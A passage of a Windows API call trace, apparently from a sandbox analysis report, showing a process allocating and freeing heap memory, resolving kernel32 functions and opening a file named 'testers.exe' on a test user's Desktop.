RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.145] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.149] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0167.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba1b0 [0167.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba1b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0167.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.150] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0167.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba1b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.150] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0167.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0167.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0167.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0167.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x32) returned 0x90ad98 [0167.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", cchWideChar=50, lpMultiByteStr=0x90ad98, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpUsedDefaultChar=0x0) returned 50 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.151] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64) returned 0x8e8320 [0167.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=50, lpWideCharStr=0x8e8320, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe") returned 50 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0167.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0167.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.158] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.159] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.159] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.159] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0167.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.159] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0167.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0167.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0167.161] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.161] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, 